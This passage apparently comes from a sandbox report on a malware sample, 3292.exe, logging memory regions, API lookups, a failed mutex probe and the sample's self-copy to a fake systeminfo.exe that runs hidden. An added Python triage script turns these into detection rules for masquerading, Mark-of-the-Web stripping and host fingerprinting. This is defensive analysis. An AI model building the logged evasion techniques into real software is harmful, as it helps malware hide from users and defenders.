Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Get Time type = Local Time, time = 2017-11-28 18:18:12 (Local Time) True 6
Get Time type = Ticks, time = 93725 True 2
Get Time type = Ticks, time = 93741 True 2
Mutex (6)
Operation Additional Information Success Count
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Process #5: 3292.exe
(Host: 86, Network: 0)
Information Value
ID #5
File Name c:\users\public\3292.exe
Command Line "C:\Users\Public\3292.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:52
OS Process Information
Information Value
PID 0xb44
Parent PID 0xb2c (c:\users\public\3292.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB48
0xB50
0xB54
0xBF0
0xBF4
0xBF8
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True True False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True True False
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable, Executable True True False
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True True False
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True True False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001b0000 0x001b0fff Memory Mapped File Readable False False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d6fff Pagefile Backed Memory Readable True False False
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x00280000 0x00283fff Memory Mapped File Readable True False False
cversions.2.db 0x00280000 0x00283fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x00290000 0x002b4fff Memory Mapped File Readable True False False
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True True False
pagefile_0x00000000003c0000 0x003c0000 0x00547fff Pagefile Backed Memory Readable True False False
private_0x0000000000550000 0x00550000 0x005cffff Private Memory Readable, Writable True True False
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x00860000 0x00b2efff Memory Mapped File Readable False False False
pagefile_0x0000000000b30000 0x00b30000 0x00b30fff Pagefile Backed Memory Readable, Writable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db 0x00b40000 0x00b6ffff Memory Mapped File Readable True False False
cversions.2.db 0x00b70000 0x00b73fff Memory Mapped File Readable True False False
pagefile_0x0000000000b80000 0x00b80000 0x00b80fff Pagefile Backed Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x0000000002000000 0x02000000 0x021fffff Private Memory Readable, Writable True True False
pagefile_0x0000000002000000 0x02000000 0x020defff Pagefile Backed Memory Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x020e0000 0x02145fff Memory Mapped File Readable True False False
private_0x0000000002160000 0x02160000 0x0219ffff Private Memory Readable, Writable True True False
private_0x00000000021c0000 0x021c0000 0x021fffff Private Memory Readable, Writable True True False
private_0x0000000002200000 0x02200000 0x025d0fff Private Memory Readable, Writable True True False
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True True False
private_0x0000000002370000 0x02370000 0x023affff Private Memory Readable, Writable True True False
private_0x00000000023e0000 0x023e0000 0x0241ffff Private Memory Readable, Writable True True False
private_0x0000000002440000 0x02440000 0x0253ffff Private Memory Readable, Writable True True False
private_0x00000000025e0000 0x025e0000 0x026dffff Private Memory Readable, Writable True True False
private_0x00000000027d0000 0x027d0000 0x028cffff Private Memory Readable, Writable True True False
private_0x00000000028d0000 0x028d0000 0x029d0fff Private Memory Readable, Writable True True False
private_0x0000000002a10000 0x02a10000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002ca0000 0x02ca0000 0x02d9ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002da0000 0x02da0000 0x03192fff Pagefile Backed Memory Readable True False False
comctl32.dll 0x74150000 0x742edfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74530000 0x74624fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b40000 0x74b55fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74b60000 0x74b80fff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74b90000 0x74b9cfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74ba0000 0x74baafff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74bb0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75650000 0x756d2fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x768a0000 0x768c6fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76900000 0x76a9cfff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76b10000 0x76b54fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x76c20000 0x76c31fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Created Files
Filename File Size YARA Match
c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 120.00 KB (122880 bytes) False
Hash Values
MD5: ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d
SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4
Host Behavior
File (9)
Operation Filename Additional Information Success Count
Get Info C:\ type = file_attributes True 1
Get Info C:\Users\ type = file_attributes True 1
Get Info C:\Users\aETAdzjz\ type = file_attributes True 1
Get Info C:\Users\aETAdzjz\AppData\ type = file_attributes True 1
Get Info C:\Users\aETAdzjz\AppData\Local\ type = file_attributes True 1
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\ type = file_attributes True 1
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Move C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe source_filename = C:\Users\Public\3292.exe True 1
Delete C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe:Zone.Identifier - False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe os_pid = 0xbfc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (48)
Operation Module Additional Information Success Count
Load msvcrt.dll base_address = 0x752a0000 True 1
Load KERNEL32.dll base_address = 0x759f0000 True 1
Load USER32.dll base_address = 0x75790000 True 1
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Load advapi32.dll base_address = 0x756e0000 True 1
Load ole32.dll base_address = 0x75450000 True 1
Load shell32.dll base_address = 0x75c50000 True 1
Load crypt32.dll base_address = 0x758d0000 True 1
Load urlmon.dll base_address = 0x76c40000 True 1
Load userenv.dll base_address = 0x74bb0000 True 1
Load wininet.dll base_address = 0x75350000 True 1
Load wtsapi32.dll base_address = 0x74b90000 True 1
Get Filename - process_name = c:\users\public\3292.exe, file_name_orig = C:\Users\Public\3292.exe, size = 260 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfa94 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfacc True 1
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3bfb3c True 1
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
Service (1)
Operation Additional Information Success Count
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
System (18)
Operation Additional Information Success Count
Get Computer Name result_out = YKYD69Q True 2
Get Computer Name result_out = YKyd69q, type = ComputerNameDnsHostname True 1
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Get Time type = Local Time, time = 2017-11-28 18:18:14 (Local Time) True 6
Get Time type = Ticks, time = 95815 True 4
Get Time type = Ticks, time = 97282 True 1
Get Time type = Ticks, time = 102289 True 1
Get Time type = Ticks, time = 103288 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 1
Mutex (7)
Operation Additional Information Success Count
Open mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE False 6
Release - True 1
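The File, Process, Module and Mutex tables above for 3292.exe show four behaviours worth turning into rules: the sample is renamed from C:\Users\Public into %LOCALAPPDATA%\Microsoft\Windows\ under the name of a Windows utility (the genuine systeminfo.exe lives in %SystemRoot%\System32), it tries and fails to delete the Zone.Identifier stream that carries the Mark-of-the-Web, it launches that copy with SW_HIDE, it resolves GetComputerNameA/GetComputerNameExA/GetUserNameA/GetModuleFileNameA by hand, and it probes one fixed mutex name six times without success. The script below is an added example written for this page, not VMRay's code or output; the record format, the allow-list of utility names and the API set are assumptions, and the sample records are constructed to mirror the rows above plus one benign control.

```python
"""Triage rules over File, Process, Module and Mutex records of the kind shown
above for 3292.exe. Added example: the rules and the record format are this
editor's, not VMRay's; the sample records are constructed from the report's rows."""
import ntpath
from dataclasses import dataclass, field

# Assumed allow-list: utilities that only legitimately run from the system
# directories. The real systeminfo.exe lives in %SystemRoot%\System32.
SYSTEM_UTILITY_NAMES = {"systeminfo.exe", "svchost.exe", "explorer.exe", "cmd.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# APIs that, resolved together at run time, fingerprint the host (assumed set).
HOST_FINGERPRINT_APIS = {"GetComputerNameA", "GetComputerNameExA",
                         "GetUserNameA", "GetModuleFileNameA"}


@dataclass
class Record:
    category: str                 # "File", "Process", "Module" or "Mutex"
    operation: str                # "Move", "Delete", "Create", "Get Address", "Open"
    target: str = ""              # file name, image path, API name or mutex name
    info: dict = field(default_factory=dict)
    success: bool = True
    count: int = 1


def is_masquerading_path(path):
    """True when a system-utility file name sits outside the system directories."""
    name = ntpath.basename(path).lower()
    return name in SYSTEM_UTILITY_NAMES and not path.lower().startswith(SYSTEM_DIRS)


def triage(records):
    """Return (rule, detail) pairs in the order the triggering records appear."""
    findings = []
    resolved = set()
    for r in records:
        if r.category == "File" and r.operation == "Move" and is_masquerading_path(r.target):
            findings.append(("masquerade", f"{r.info.get('source_filename')} -> {r.target}"))
        elif r.category == "File" and r.operation == "Delete" \
                and r.target.lower().endswith(":zone.identifier"):
            # Deleting the Zone.Identifier stream strips Mark-of-the-Web; the attempt
            # is the signal, so a failed delete is flagged as well.
            findings.append(("motw_strip_attempt",
                             r.target + ("" if r.success else " (failed)")))
        elif r.category == "Process" and r.operation == "Create" \
                and r.info.get("show_window") == "SW_HIDE" and is_masquerading_path(r.target):
            findings.append(("hidden_masquerade_exec", r.target))
        elif r.category == "Module" and r.operation == "Get Address":
            resolved.add(r.target)
        elif r.category == "Mutex" and r.operation == "Open" and not r.success and r.count >= 3:
            # Repeated failed OpenMutex on one fixed name: single-instance marker probe.
            findings.append(("mutex_probe", r.target))
    if HOST_FINGERPRINT_APIS <= resolved:
        findings.append(("host_fingerprint_apis", ", ".join(sorted(HOST_FINGERPRINT_APIS))))
    return findings


# Constructed records mirroring the 3292.exe tables above, plus one benign control
# (the genuine utility launched from System32 must not fire).
SAMPLE_RECORDS = [
    Record("File", "Move", r"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe",
           {"source_filename": r"C:\Users\Public\3292.exe"}),
    Record("File", "Delete",
           r"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe:Zone.Identifier",
           success=False),
    Record("Process", "Create", r"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe",
           {"show_window": "SW_HIDE", "startup_flags": "STARTF_FORCEOFFFEEDBACK"}),
    Record("Process", "Create", r"C:\Windows\System32\systeminfo.exe", {"show_window": "SW_HIDE"}),
    *[Record("Module", "Get Address", api) for api in
      ("FindFirstFileW", "GetModuleFileNameA", "GetComputerNameA",
       "GetComputerNameExA", "GetUserNameA")],
    Record("Mutex", "Open", "XoBZXxTVpSVrDHIx3tCj", success=False, count=6),
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_RECORDS):
        print(f"{rule:24} {detail}")
```

The path rule keys on the file name only, so the same check applies to any later copy of the binary regardless of the user profile it lands in; the mutex rule uses the failure count rather than the name, since the name is per-family and the repeated failed open is the generic behaviour.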
Process #6: systeminfo.exe
(Host: 59, Network: 0)
Information Value
ID #6
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:39, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:44
OS Process Information
Information Value
PID 0xbfc
Parent PID 0xb44 (c:\users\public\3292.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x740
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True False False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable True True False
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory Readable, Writable, Executable True False False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True True False
private_0x00000000001b0000 0x001b0000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True True False
pagefile_0x00000000003e0000 0x003e0000 0x004befff Pagefile Backed Memory Readable True False False
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True True False
private_0x00000000005e0000 0x005e0000 0x006dffff Private Memory Readable, Writable True False False
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000860000 0x00860000 0x009e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000009f0000 0x009f0000 0x00b70fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x00000000021b0000 0x021b0000 0x021bffff Private Memory Readable, Writable True True False
sortdefault.nls 0x021c0000 0x0248efff Memory Mapped File Readable False False False
private_0x0000000002490000 0x02490000 0x02860fff Private Memory Readable, Writable True True False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
